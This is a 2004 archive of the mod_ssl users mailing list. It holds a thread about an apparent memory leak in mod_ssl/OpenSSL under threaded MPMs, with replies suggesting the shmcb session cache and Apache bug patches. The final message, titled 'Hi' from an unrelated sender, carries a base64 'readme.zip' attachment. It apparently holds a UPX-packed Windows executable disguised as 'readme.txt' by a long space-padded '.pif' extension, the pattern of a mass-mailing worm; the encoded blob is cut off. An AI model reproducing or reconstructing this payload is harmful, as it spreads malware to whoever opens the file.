3. Build them both, with apache add the mod_ssl option and also for Linux
use the MPM worker module.
4. Install and modify the ssl.conf file ServerName value.
5. Run Apache (httpd)
6a. Run the Performance monitor on Windows and look at Private Bytes for the
second Apache process.
6b. On Linux run top -p pid(httpd1) -p pid(http2) ... -p pid(httpN) watching
the size of the processes
7. Set you browser to not cache requests and check for a new page every
time.
8. Start fetching a page from https://localhost and keep refreshing the
page.
So far 3 other engineers have reproduced this test because they did not
believe the problem could be in Apache mod_ssl/OpenSSL, they all verified
that it leaks like a sieve.
We were all trying to figure out why no one else has complained about such a
huge leak so we ran another test. We tried using the prefork MPM and it
turns out that worked fine. Based on the results it appears the OS is
cleaning up memory for the prefork module and the threaded model never gets
its memory freed. I have used a debugger on Windows and set break points on
the CRYPTO_malloc and CRYPTO_free functions and have seen gobs of memory
CRYPTO_malloc(ed) and not one time have I seen CRYPTO_free called. I was not
sure if having the OS cleanup memory was part of the design (if indeed that
is what is happening) or if there is potentially a problem in the OpenSSL
memory management code.
With all this said, I am by no means an expert on this code and could really
use some help understanding what is going on here?
Any and all help is appreciated,
Ken


---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.574 / Virus Database: 364 - Release Date: 29/01/2004

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 30 18:35:32 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A86A1A8A4D; Fri, 30 Jan 2004 18:35:32 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dymwsm07.mailwatch.com (dymwsm07.mailwatch.com [204.253.83.43])
	by master.modssl.org (Postfix) with ESMTP id 6279CA8934
	for ; Fri, 30 Jan 2004 18:35:17 +0100 (CET)
Received: from mwsc0213.mw4.mailwatch.com (mwsc0213.mw4.mailwatch.com [204.253.83.252])
	by dymwsm07.mailwatch.com (8.12.9/8.12.9) with ESMTP id i0UHZGws032022
	for ; Fri, 30 Jan 2004 12:35:16 -0500
Received: from mail pickup service by mwsc0213.mw4.mailwatch.com with Microsoft SMTPSVC;
	 Fri, 30 Jan 2004 12:35:16 -0500
Received: from 204.253.83.23 ([204.253.83.23]) by MWSC0213 with SMTP id 0002000db5340c9a-2d25-4467-87f5-080cef803a02;
	 Fri, 30 Jan 2004 12:35:16 -0500
Received: from bigbird.entegrity.com (bigbird.entegrity.com [192.92.110.50])
	by dymwsm20.mailwatch.com (8.12.9/8.12.9) with ESMTP id i0UHZ1LS020074
	for ; Fri, 30 Jan 2004 12:35:02 -0500 (EST)
Received: from JOHUGHES ([192.92.110.176]) by bigbird.entegrity.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.10)
	id DPCXHA6H; Fri, 30 Jan 2004 12:28:11 -0500
From: "John Hughes" 
To: 
Subject: RE: There appears to be a major memory leak in mod_ssl/OpenSSL
Date: Fri, 30 Jan 2004 17:35:04 -0000
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0056_01C3E757.657A7100"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.6604 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
In-Reply-To: 
X-MW-BTID: 090825000020040306330200002
X-MW-CTIME: 1075484101
X-MW-SENDING-MTA: 192.92.110.50
HOP-COUNT: 1
X-MAILWATCH-INSTANCEID: 0102000db5340c9a-2d25-4467-87f5-080cef803a02
X-OriginalArrivalTime: 30 Jan 2004 17:35:16.0271 (UTC) FILETIME=[6C5CFBF0:01C3E757]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John Hughes" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0056_01C3E757.657A7100
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

There appears to be a major memory leak in mod_ssl/OpenSSLAre u using:

> On linux you really should be using a shared memory session cache - like
> SSLSessionCache shmcb:logs/ssl_gcache_data(512000)

> SSLSessionCacheTimeout 300


and not the dbm cache

I posted some email about this just before XMAS where I had found a "memory
leak" - and Mads Toftum suggested the use of shmcb.  I then ran tests for
nearly a week - without a hint of a memory leak


John
  -----Original Mess
   age-----
  From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Avery, Ken
  Sent: 30 January 2004 17:02
  To: modssl-users@modssl.org
  Subject: There appears to be a major memory leak in mod_ssl/OpenSSL


  I have been tracking this down for a couple of weeks and thought it was in
the code my company is developing and it appears that is not the case. In
order to eliminate our code from the mix and isolate the problem here is
what I did:

  This was done on Windows and Linux:
  1. Download the latest Apache from www.apache.org.
  2. Download the latest OpenSSL from www.openssl.org.
  3. Build them both, with apache add the mod_ssl option and also for Linux
use the MPM worker module.
  4. Install and modify the ssl.conf file ServerName value.
  5. Run Apache (httpd)
  6a. Run the Performance monitor on Windows and look at Private Bytes for
the second Apache process.
  6b. On Linux run top -p pid(httpd1) -p pid(http2) ... -p pid(httpN)
watching the size of the processes
  7. Set you browser to not cache requests and check for a new page every
time.
  8. Start fetching a page from https://localhost and keep refreshing the
page.
  So far 3 other engineers have reproduced this test because they did not
believe the problem could be in Apache mod_ssl/OpenSSL, they all verified
that it leaks like a sieve.

  We were all trying to figure out why no one else has complained about such
a huge leak so we ran another test. We tried using the prefork MPM and it
turns out that worked fine. Based on the results it appears the OS is
cleaning up memory for the prefork module and the threaded model never gets
its memory freed. I have used a debugger on Windows and set break points on
the CRYPTO_malloc and CRYPTO_free functions and have seen gobs of memory
CRYPTO_malloc(ed) and not one time have I seen CRYPTO_free called. I was not
sure if having the OS cleanup memory was part of the design (if indeed that
is what is happening) or if there is potentially a problem in the OpenSSL
memory management code.

  With all this said, I am by no means an expert on this code and could
really use some help understanding what is going on here?

  Any and all help is appreciated,
  Ken

------=_NextPart_000_0056_01C3E757.657A7100
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


There appears to be a major memory leak in =
mod_ssl/OpenSSL




Are u=20
using:


 


> On linux you =
really should=20
be using a shared memory session cache - like


> SSLSessionCache shmcb:logs/ssl_gcache_data(512000)


> SSLSessionCacheTimeout 300


 


and not the dbm=20
cache 


 


I=20
posted some email about this just before XMAS where I had found a =
"memory leak"=20
- and Mads Toftum suggested the use of shmcb.  I =
then ran=20
tests for nearly a week - without a hint of a memory=20
leak


 


 


John



------=_NextPart_000_0056_01C3E757.657A7100--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 30 20:01:42 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 291EFA8963; Fri, 30 Jan 2004 20:01:42 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ztxmail05.ztx.compaq.com (ztxmail05.ztx.compaq.com [161.114.1.209])
	by master.modssl.org (Postfix) with ESMTP id 660CAA8934
	for ; Fri, 30 Jan 2004 20:01:29 +0100 (CET)
Received: from cceexg11.americas.cpqcorp.net (cceexg11.americas.cpqcorp.net [16.81.1.28])
	by ztxmail05.ztx.compaq.com (Postfix) with ESMTP
	id E80FBDEAF; Fri, 30 Jan 2004 13:00:54 -0600 (CST)
Received: from cceexc23.americas.cpqcorp.net ([16.110.250.2]) by cceexg11.americas.cpqcorp.net with Microsoft SMTPSVC(6.0.3790.0);
	 Fri, 30 Jan 2004 13:00:53 -0600
X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: There appears to be a major memory leak in mod_ssl/OpenSSL
Date: Fri, 30 Jan 2004 13:00:53 -0600
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: There appears to be a major memory leak in mod_ssl/OpenSSL
Thread-Index: AcPnVKH8BYm5E8GvTHyKXjGrD9t38AADb24A
From: "Avery, Ken" 
To: "Joe Orton" 
Cc: 
X-OriginalArrivalTime: 30 Jan 2004 19:00:53.0865 (UTC) FILETIME=[629B9D90:01C3E763]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Avery, Ken" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have tried the shmcb and that does not help, I think the real issue
has to do with worker MPM verses prefork MPM. Note: Linux worker MPM and
Windows mpm_winnt MPM are threaded verses prefork MPM which has its own
memory space.

I will try the patches Joe recommended and see what happens.

Thanks Joe,
Ken

BTW - I am using 2.0.48, I just download the latest and see the problem.

-----Original Message-----
From: Joe Orton [mailto:jorton@redhat.com]=20
Sent: Friday, January 30, 2004 11:13 AM
To: Avery, Ken
Cc: modssl-users@modssl.org
Subject: Re: There appears to be a major memory leak in mod_ssl/OpenSSL


On Fri, Jan 30, 2004 at 11:02:06AM -0600, Avery, Ken wrote:
> I have been tracking this down for a couple of weeks and thought it=20
> was in the code my company is developing and it appears that is not=20
> the case. In order to eliminate our code from the mix and isolate the=20
> problem here is what I did: This was done on Windows and Linux:
> 1. Download the latest Apache from www.apache.org.=20
> 2. Download the latest OpenSSL from www.openssl.org.=20
> 3. Build them both, with apache add the mod_ssl option and also for
> Linux use the MPM worker module.=20

Are you using 2.0.48?  Could be one of these two bugs:

http://nagoya.apache.org/bugzilla/show_bug.cgi?id=3D25667
http://nagoya.apache.org/bugzilla/show_bug.cgi?id=3D25659

Try using the 'shmcb' session cache instead of dbm.

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 30 22:06:04 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 94D3EA8959; Fri, 30 Jan 2004 22:06:04 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ztxmail05.ztx.compaq.com (ztxmail05.ztx.compaq.com [161.114.1.209])
	by master.modssl.org (Postfix) with ESMTP id 88C32A8940
	for ; Fri, 30 Jan 2004 22:05:51 +0100 (CET)
Received: from cceexg12.americas.cpqcorp.net (cceexg12.americas.cpqcorp.net [16.81.1.33])
	by ztxmail05.ztx.compaq.com (Postfix) with ESMTP
	id D188CDE50; Fri, 30 Jan 2004 15:05:48 -0600 (CST)
Received: from cceexc23.americas.cpqcorp.net ([16.110.250.2]) by cceexg12.americas.cpqcorp.net with Microsoft SMTPSVC(6.0.3790.0);
	 Fri, 30 Jan 2004 15:05:48 -0600
X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: There appears to be a major memory leak in mod_ssl/OpenSSL
Date: Fri, 30 Jan 2004 15:05:47 -0600
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: There appears to be a major memory leak in mod_ssl/OpenSSL
Thread-Index: AcPnVKH8BYm5E8GvTHyKXjGrD9t38AAH7I6w
From: "Avery, Ken" 
To: "Joe Orton" 
Cc: 
X-OriginalArrivalTime: 30 Jan 2004 21:05:48.0409 (UTC) FILETIME=[D5B44690:01C3E774]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Avery, Ken" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I just tried the 2 patches listed below and they did not make a
difference, using mpm_winnt and worker MPM.

-----Original Message-----
From: Joe Orton [mailto:jorton@redhat.com]=20
Sent: Friday, January 30, 2004 11:13 AM
To: Avery, Ken
Cc: modssl-users@modssl.org
Subject: Re: There appears to be a major memory leak in mod_ssl/OpenSSL


On Fri, Jan 30, 2004 at 11:02:06AM -0600, Avery, Ken wrote:
> I have been tracking this down for a couple of weeks and thought it=20
> was in the code my company is developing and it appears that is not=20
> the case. In order to eliminate our code from the mix and isolate the=20
> problem here is what I did: This was done on Windows and Linux:
> 1. Download the latest Apache from www.apache.org.=20
> 2. Download the latest OpenSSL from www.openssl.org.=20
> 3. Build them both, with apache add the mod_ssl option and also for
> Linux use the MPM worker module.=20

Are you using 2.0.48?  Could be one of these two bugs:

http://nagoya.apache.org/bugzilla/show_bug.cgi?id=3D25667
http://nagoya.apache.org/bugzilla/show_bug.cgi?id=3D25659

Try using the 'shmcb' session cache instead of dbm.

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From coastplan@coastalplanners.org  Sun Feb  1 19:25:12 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from coastalplanners.org (usen-221x117x198x169.ap-US01.usen.ad.jp [221.117.198.169])
	by master.modssl.org (Postfix) with ESMTP id C7EBDA8977
	for ; Sun,  1 Feb 2004 19:25:09 +0100 (CET)
From: coastplan@coastalplanners.org
To: modssl-users-l@master.modssl.org
Subject: Hi
Date: Mon, 2 Feb 2004 03:25:23 +0900
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----=_NextPart_000_0004_6917C884.19ACFBD7"
X-Priority: 3
X-MSMail-Priority: Normal
Message-Id: <20040201182509.C7EBDA8977@master.modssl.org>

This is a multi-part message in MIME format.

------=_NextPart_000_0004_6917C884.19ACFBD7
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit




------=_NextPart_000_0004_6917C884.19ACFBD7
Content-Type: application/octet-stream;
	name="readme.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="readme.zip"

UEsDBAoAAAAAACuTQTDKJx+eAFgAAABYAABUAAAAcmVhZG1lLnR4dCAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAucGlm
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAqAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUA
AEwBAwAAAAAAAAAAAAAAAADgAA8BCwEHAABQAAAAEAAAAGAAAGC+AAAAcAAAAMAAAAAASgAAEAAA
AAIAAAQAAAAAAAAABAAAAAAAAAAA0AAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQ
AAAAAAAAAAAAAADowQAAMAEAAADAAADoAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAABVUFgwAAAAAABgAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAAAACAAADg
VVBYMQAAAAAAUAAAAHAAAABQAAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAADAAAAA
BAAAAFQAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAMS4yNABVUFghDAkCCUh+iY/UNhyBKZYAAFNOAAAAgAAAJgEAxe6H
ApIAUCZKAEAD/bJpmiwQBPQl6AEAS85pmm7ZH8gqwAO4sKimaZqmoJiQiICapmmaeHBoYFhQzWCf
aUgARAc4MDRN03QDKCQcGBDTLLvXCCMD+Cnw6E3TNE3g2NDIvLQ0TdM0rKSclIzONk3TiHxwaClv
XKbpmsEHVEwDRDiapmmaLCQcFAwEaZrObfwofwP07OSmaZqm3NTMyLyapmmatKykoJiQZ5umaYyA
eHAoe2jebNN1B1wDVEwo//sLdrb740APNCj3LC8DmqYZ+SQoShwUDARpms7sm/wnA+zo4KZpmqbY
1MzIwJqmabq4J7CsqKCYaZqmaZSMiIR8pGmapnRsZFxUaZqmG0wDREA4MKZpmqYoIBgQCJqmc5sA
+CbPA+jg2Gebzm1UNEMDQDQ024r/////nVrQ2uX0Bh8zTmxyTtgCl1+SyAE9fL5DS5bkNYngOpf/
////91rAKZUEdutj3lzdYehy/48iuFHtjC7TeybUDTnwqmf/////J+qweUUU5ruTbkwtEfjiz7+y
qKGdnJ6jq7bE1ekAGjf/////V3qgyfUkVovD/jx9wQhSn+9CmPFNrA5z20a0JZkQigf/////hwqQ
GaWlqP7yw9Ko+BIsSmuPtuANPXCm3xtafOEnVcn/////EmC+GGXVOJ4Xc+JUiUG8muM/xlCNbQCW
T8tqDLFDerL/////cxfOiEcFyIpXI/LEmXFMLgvv1sCtnZCGD3t6fJGJlKL/////s8fe+hU1WH6n
wwI0eaHcGluP5jBtzSB2zyuK/FG5JJL/////A3fuaOVl6G6Xg4N2jJWhsMLX7wooSW2UvusbToS9
+Tj/////er8HUqDxRWyWU7MafOVRwDKnH5oYmR2kLrtL3nQNqUj/////6o834pBB9axmI+OmbDUB
0KJ3TyoI6c20not7bmRdWVj/////Wl9ncoCRpbzW8xM2XIWx4BJHf7r4OX3EDlur/lStCT3/////
mnenAnDhVcwGw0PGXNVhYWRqc3+MoLXN6AYnS3Kcyfn/////LGKbVxZYfbBgJv4jetQxkeRawy/O
EIX9dPZ3+4AMmSn/////vFLrhybIbRXAbh+TikThlNQSId+ugFUtGObHq/J8aVn/////TkI7Nzg4
PUVQXm+DmrTR8RQ6Y8++8OVstuQjW/e8Yaj/////0DuJ7nM8Y/iZ4MVLkRehId4isz8/VEhRe29+
1s/ZbpX/3/7/KQMj6ZQJv+bzpUEQpnwyaWuAIQstx07SEIJs+f////9zp3feFIcHB/tSqgFhwCyb
9yaW3ZedImAPRp7N/SxAf/////+TstLxCSBYdmhjXVBSUVNqZHcBLMXvVDC8VxE8zp1Xbv////8g
461g2tFSFc5mX7dBwBTkZZOfeP5yDbznapV7exN2dv////99HA0t8vb0sPHR53n63Uxlo/8nbIzd
C9uMG6m9dYc7T//////bFIJCFAlFzIIP+mK3KXP7FYPnHpN+tCRpKf+9KMvqTv//7f93Djqwv/dU
1OxzmAFNBp3yoq/CYvPlXjffBXFS/////wf4G0B+VD6nqU8sAn0wyOcG0lQqGmtMAZ0E9mr6HccG
/4X///gdkASrlgAGBhAr75nUTv8XeAuTxvh1IYyk/////1//zHJr62/+pf3s0EHJeJHZxKwmx+jg
qbcaXW/sKRCj/////7zz7fVvUSE1jdZTHEgpGOO3XD+duM3QUlXjtUPqvmfj/////6CgMuLOSTok
LzAKj66E4XVAoWKYsvUwSuDj/5GBwScH/////3eIZ49Us4UI4v6CRathjnTauyo4rvBK1BicF4pI
wrW8/////577H1bmbpDgO0ezoBq30qq8xPeTSKYBwAT/BhKLXanY/////72UMfgf6FpjPt/WCspC
1QxeYEly9fSu9FMX/BYV8o6a/////3NwPIKx4o43W1MWoieUVFissTU3Pqp1ZZUhbusahIFq////
/+YKGD86lZ+BguNzpEc9CQLWLojCp9U/ilzqn1Y7Xz1K/9L//8N5X0MJuPCrms4esoXZS8HUO17P
3/ZH+Ur3/////9j7LbSKZ2L/WK0RjCL3W8tY34X8rOBl2uuXlOJgCO8//////zzj7H8QjmB+3U2b
5J0FG5d628yz+zePJfE5HbJ8GvUd/////x+9n+nG6unrPtmWcP072kUl9vOk59YEIUw5/lukh4mS
////C53TsFuNKjZCG8rR5DRQrMMcxeFmimxbM1FC/////+0+I6ti1+6U9DSy6dVJrF4mrrxteWeV
WzeGpII9rofD/////4ewgLbfQ9+7i4BlLx6oMsu1KpM3Q3niYjRauu1pXGwi/////6wY1XPh68iG
L1pJT/FD8zfLbzYYPWctofGYQhK4DcHK/7f//2sKa/gFjY0HnpfoiFC2srjZ8zKBX9p+X/fQHQ3/
////ShsDOn0PPwtPGPEr4Yi1NyT31AcfN2/Na5BdQpaXn6L/////n50vJlZAhvcbrLVavCc7JKSd
idPIpU82+mgAvj5dGdb/2///9ckUyfDkjiw2iQvghuvRCwoz07M2hpLkvYowoP/////HuV680N6r
wchK14K/XeWgnpOQJdhALzGgCaazMAGh2P////9frZFovBhyOfUsoWNhix4aQSY3G0eq2fC7xeYx
4EwsaTf+///o+hHGcPdD+0ei2qDV9yjFv7WVcNEE9fBNaRv8////lj2TBqUsujl4DNudAiPDmVWW
hFuHQjz/////MzSANfYd8ySmXsbvONrcqoff2HIvP8Tk9pY2j0Q1R/X/////QdWRJmlnyhPaLDJt
CSkRc1pBVgs6PfBSHawvphrwt/r//0v/MRQml5IPtKQsvl7QDM/PtwBr03qRVDiIkrH/N2j/5Qrn
4JUlmsjO1oIDpc578bTzHTb//1/4sAzRf5GPJf5SijZ1a+/bwdkjxg8+dRWkwP3/////vLrDPAha
53OGbtWwV3A6D36k3FDVQj8Pjq8/q+BAc+P///8bwlx/iRSy+e0DGCL+C48qlJUdTWH6Jm9hE4O/
8P///h3CDD375n8/KDSeK68izSmi62dcuGhJfmZLf4P/wKqq0yrLdWigKKdI39unGj0l/////yQF
1+Xs4O3i+PkOZ5dWkbv0XM3X35G6tz+5ml2IrF05/xb//+xxa5fsK8AuCGjFnVkbCQvvGbZTWZVZ
D/////8Sdvmb1JGvTrBBSKDuhyimZ58Oxz9PyLYCxZlctWRzDr/E//+bALZBVBTrCYPqxQD5jmVe
aGEU9uPhUpP/wv//2shfm3fGoonK0uTbIvEfjxzJrtVAeLhM3Hz/////8cmzboBqoIUrhLngq83n
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
